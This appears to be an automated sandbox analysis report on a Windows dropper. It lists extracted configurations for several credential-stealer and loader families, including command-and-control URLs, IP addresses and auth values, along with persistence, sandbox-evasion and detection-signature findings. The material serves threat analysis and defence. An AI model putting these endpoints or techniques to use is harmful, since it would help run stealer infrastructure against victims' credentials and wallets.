Analysis
-
max time kernel
156s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 13:55
Static task
static1
Behavioral task
behavioral1
Sample
60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe
Resource
win10v2004-en-20220113
General
-
Target
60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe
-
Size
4.0MB
-
MD5
eba403353901b5fa6754e107870024b2
-
SHA1
aea5db03e085af98a0ea7dc2317c3a6318b2e51a
-
SHA256
60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3
-
SHA512
498b6ed94d5a2edc284e0729d47b4034a1438da9891427c12022264f5b96a4ce00a5ab1625dca6ab8d27ee7431cb3b82692ec33aeb46cbe71138e4626a554919
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
dadad123
86.107.197.196:63065
-
auth_value
dd4834614a3ac04a7b90791c224626a2
Extracted
vidar
50.6
937
https://mas.to/@s4msalo
https://koyu.space/@samsa2l
-
profile_id
937
Extracted
redline
nusha
65.108.27.131:45256
-
auth_value
1d7f942cf65dce68d206c152c3cd5a4a
Signatures
-
DcRat 14 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
NetdhcpsvcDriverintocrt.exeschtasks.exeschtasks.exepzyh.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exeschtasks.exeschtasks.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Install = "\"C:\\Program Files\\Common Files\\DESIGNER\\Install.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge\\msedge.exe\"" NetdhcpsvcDriverintocrt.exe 5912 schtasks.exe 6060 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Install = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\18e190413af045db88dfbd29609eb877\\Install.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe 5468 schtasks.exe 4384 schtasks.exe 3972 schtasks.exe 6020 schtasks.exe 60 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe 5448 schtasks.exe 5340 schtasks.exe -
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6020 4300 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3972 4300 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5912 4300 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5468 4300 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4384 4300 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5448 4300 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6060 4300 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\A6K08m5pRpo6aGMX_AWxJpZ6.exe family_redline C:\Users\Admin\Documents\A6K08m5pRpo6aGMX_AWxJpZ6.exe family_redline behavioral2/memory/4232-384-0x0000000000240000-0x0000000000260000-memory.dmp family_redline behavioral2/memory/2516-467-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars -
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
OnlyLogger Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3612-156-0x0000000000B00000-0x0000000000B30000-memory.dmp family_onlylogger behavioral2/memory/3612-157-0x0000000000400000-0x00000000009C0000-memory.dmp family_onlylogger behavioral2/memory/6072-393-0x0000000000400000-0x0000000000492000-memory.dmp family_onlylogger behavioral2/memory/6072-392-0x0000000000630000-0x0000000000674000-memory.dmp family_onlylogger -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/6012-402-0x0000000002130000-0x00000000021DC000-memory.dmp family_vidar behavioral2/memory/6012-403-0x0000000000400000-0x00000000004CE000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 33 IoCs
Processes:
Files.exeInstall.exeKRSetp.exejg3_3uag.exeFile.exeFolder.exeInstallation.exepzyh.exepub2.exeInfo.exejfiag3g_gg.exejfiag3g_gg.exerAygDhsCG3o6w9CTNCgqbkYH.exe88_AKQYj8XKniHVblGMGInY1.exeQ9TMJHcyWJ57WbegY93a0ML8.exeA6K08m5pRpo6aGMX_AWxJpZ6.exeYKOKkaI3LsSt6IA_vuSEb54U.exenn3clCgMOnoaDCpiVeYozBOV.exe1RtnrOsPJsTdMrVTQK_5xpeq.exeHiCCOQU8W2MgCEoQfgwK62LY.exeschtasks.exepLi5dA69x4EhZad08LfBG3Z2.exeeim8dzujv6RVgvDjU2rBScoJ.exeFrkWCoBi3Z2dPBaJvUIiG48f.exez9bHtF5UDDCm2VBLh0RUU9Hi.exev0Bp_MkdSi3FaqCdJ94sVkiH.exe6GxkmH81UFeTL6uaB914G5CB.exeInstall.exeInstall.exeNetdhcpsvcDriverintocrt.exeidentity_helper.exeAccostarmi.exe.pifttthwfepid process 3656 Files.exe 3612 Install.exe 4160 KRSetp.exe 4172 jg3_3uag.exe 3120 File.exe 4660 Folder.exe 4252 Installation.exe 4452 pzyh.exe 4980 pub2.exe 1512 Info.exe 4924 jfiag3g_gg.exe 4292 jfiag3g_gg.exe 5960 rAygDhsCG3o6w9CTNCgqbkYH.exe 5948 88_AKQYj8XKniHVblGMGInY1.exe 2984 Q9TMJHcyWJ57WbegY93a0ML8.exe 4232 A6K08m5pRpo6aGMX_AWxJpZ6.exe 5892 YKOKkaI3LsSt6IA_vuSEb54U.exe 5884 nn3clCgMOnoaDCpiVeYozBOV.exe 4048 1RtnrOsPJsTdMrVTQK_5xpeq.exe 6012 HiCCOQU8W2MgCEoQfgwK62LY.exe 6060 schtasks.exe 3496 pLi5dA69x4EhZad08LfBG3Z2.exe 6072 eim8dzujv6RVgvDjU2rBScoJ.exe 6084 FrkWCoBi3Z2dPBaJvUIiG48f.exe 1540 z9bHtF5UDDCm2VBLh0RUU9Hi.exe 5140 v0Bp_MkdSi3FaqCdJ94sVkiH.exe 5924 6GxkmH81UFeTL6uaB914G5CB.exe 5956 Install.exe 3476 Install.exe 5812 NetdhcpsvcDriverintocrt.exe 4320 identity_helper.exe 5248 Accostarmi.exe.pif 4116 ttthwfe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe upx C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect behavioral2/memory/4172-141-0x0000000000400000-0x0000000000651000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Files.exev0Bp_MkdSi3FaqCdJ94sVkiH.exeWScript.exeNetdhcpsvcDriverintocrt.exeHiCCOQU8W2MgCEoQfgwK62LY.exeInstall.exe60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exeFolder.exeInfo.exeQ9TMJHcyWJ57WbegY93a0ML8.exeeim8dzujv6RVgvDjU2rBScoJ.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Files.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation v0Bp_MkdSi3FaqCdJ94sVkiH.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation NetdhcpsvcDriverintocrt.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation HiCCOQU8W2MgCEoQfgwK62LY.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Info.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Q9TMJHcyWJ57WbegY93a0ML8.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation eim8dzujv6RVgvDjU2rBScoJ.exe -
Loads dropped DLL 5 IoCs
Processes:
pub2.exerUNdlL32.eXeHiCCOQU8W2MgCEoQfgwK62LY.exettthwfepid process 4980 pub2.exe 3760 rUNdlL32.eXe 6012 HiCCOQU8W2MgCEoQfgwK62LY.exe 6012 HiCCOQU8W2MgCEoQfgwK62LY.exe 4116 ttthwfe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
NetdhcpsvcDriverintocrt.exe6GxkmH81UFeTL6uaB914G5CB.exepzyh.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\identity_helper = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\wdag\\identity_helper.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Install = "\"C:\\Program Files\\Common Files\\DESIGNER\\Install.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge\\msedge.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\ProgramData\\Oracle\\Java\\javapath\\cmd.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\fms\\dllhost.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eyxrppteq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mzpexsf\\Eyxrppteq.exe\"" 6GxkmH81UFeTL6uaB914G5CB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Install = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\18e190413af045db88dfbd29609eb877\\Install.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\System32\\wbem\\WmiPerfClass\\WmiPrvSE.exe\"" NetdhcpsvcDriverintocrt.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg3_3uag.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com 19 ipinfo.io 20 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe -
Drops file in System32 directory 5 IoCs
Processes:
Install.exeNetdhcpsvcDriverintocrt.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\System32\wbem\WmiPerfClass\WmiPrvSE.exe NetdhcpsvcDriverintocrt.exe File created C:\Windows\System32\wbem\WmiPerfClass\24dbde2999530e NetdhcpsvcDriverintocrt.exe File created C:\Windows\System32\fms\dllhost.exe NetdhcpsvcDriverintocrt.exe File created C:\Windows\System32\fms\5940a34987c991 NetdhcpsvcDriverintocrt.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
6GxkmH81UFeTL6uaB914G5CB.exedescription pid process target process PID 5924 set thread context of 2516 5924 6GxkmH81UFeTL6uaB914G5CB.exe MSBuild.exe -
Drops file in Program Files directory 9 IoCs
Processes:
setup.exeNetdhcpsvcDriverintocrt.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\0be699e0-84ce-4d14-a06b-8872ab56cb7d.tmp setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge\msedge.exe NetdhcpsvcDriverintocrt.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge\61a52ddc9dd915 NetdhcpsvcDriverintocrt.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310140648.pma setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\identity_helper.exe NetdhcpsvcDriverintocrt.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\identity_helper.exe NetdhcpsvcDriverintocrt.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\1c7346099e1d63 NetdhcpsvcDriverintocrt.exe File created C:\Program Files\Common Files\DESIGNER\Install.exe NetdhcpsvcDriverintocrt.exe File created C:\Program Files\Common Files\DESIGNER\59ea3aec4985a1 NetdhcpsvcDriverintocrt.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3300 3612 WerFault.exe Install.exe 2948 3612 WerFault.exe Install.exe 2308 3760 WerFault.exe rUNdlL32.eXe 2828 3612 WerFault.exe Install.exe 4428 3612 WerFault.exe Install.exe 1280 3612 WerFault.exe Install.exe 4796 3612 WerFault.exe Install.exe 4824 3612 WerFault.exe Install.exe 3456 3612 WerFault.exe Install.exe 6092 5960 WerFault.exe 5156 5948 WerFault.exe 88_AKQYj8XKniHVblGMGInY1.exe 5932 5884 WerFault.exe nn3clCgMOnoaDCpiVeYozBOV.exe 4116 6060 WerFault.exe TN1xzgBTrmoLCEkc7PAVekRf.exe 5868 6072 WerFault.exe eim8dzujv6RVgvDjU2rBScoJ.exe 5848 5960 WerFault.exe rAygDhsCG3o6w9CTNCgqbkYH.exe 5512 5884 WerFault.exe nn3clCgMOnoaDCpiVeYozBOV.exe 5440 6060 WerFault.exe TN1xzgBTrmoLCEkc7PAVekRf.exe 2268 6072 WerFault.exe eim8dzujv6RVgvDjU2rBScoJ.exe 5184 6072 WerFault.exe eim8dzujv6RVgvDjU2rBScoJ.exe 3564 6072 WerFault.exe eim8dzujv6RVgvDjU2rBScoJ.exe 60 6072 WerFault.exe eim8dzujv6RVgvDjU2rBScoJ.exe 836 6072 WerFault.exe eim8dzujv6RVgvDjU2rBScoJ.exe 5296 6072 WerFault.exe eim8dzujv6RVgvDjU2rBScoJ.exe 3592 3612 WerFault.exe Install.exe 3648 3612 WerFault.exe Install.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ttthwfepub2.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ttthwfe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ttthwfe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ttthwfe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
HiCCOQU8W2MgCEoQfgwK62LY.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 HiCCOQU8W2MgCEoQfgwK62LY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HiCCOQU8W2MgCEoQfgwK62LY.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3972 schtasks.exe 5468 schtasks.exe 5448 schtasks.exe 60 schtasks.exe 5340 schtasks.exe 6020 schtasks.exe 5912 schtasks.exe 4384 schtasks.exe 6060 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4612 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 5644 tasklist.exe 4224 tasklist.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
msedge.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3324 taskkill.exe 5804 taskkill.exe 5560 taskkill.exe 5600 taskkill.exe -
Modifies registry class 6 IoCs
Processes:
Q9TMJHcyWJ57WbegY93a0ML8.exeFolder.exemsedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings Q9TMJHcyWJ57WbegY93a0ML8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Folder.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ -
Processes:
1RtnrOsPJsTdMrVTQK_5xpeq.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 1RtnrOsPJsTdMrVTQK_5xpeq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 1RtnrOsPJsTdMrVTQK_5xpeq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f